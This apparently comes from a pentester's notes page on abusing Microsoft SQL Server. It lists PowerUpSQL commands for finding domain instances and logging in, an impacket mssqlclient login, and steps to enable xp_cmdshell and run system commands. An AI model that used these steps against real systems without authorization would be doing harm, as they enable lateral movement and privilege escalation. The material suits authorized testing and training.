💽

MSSQL Abuse

Tags
AuthenticatedLateral MovementPrivilege Escalation

Identify

GitHub PowerUpSQL Cheat SheetGitHub PowerUpSQL Cheat Sheet

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

Connect - Windows

Get-SQLQuery -Verbose -Instance "host,port" -username "domain.local\\user" -password "password" -query 'Select @@version'
Local

Connect - Linux

mssqlclient.py DOMAIN/USER@IP -windows-auth

Exploit

Run commands with xp_cmdshell

SQL> enable_xp_cmdshell
xp_cmdshell whoami /priv
linux - impacket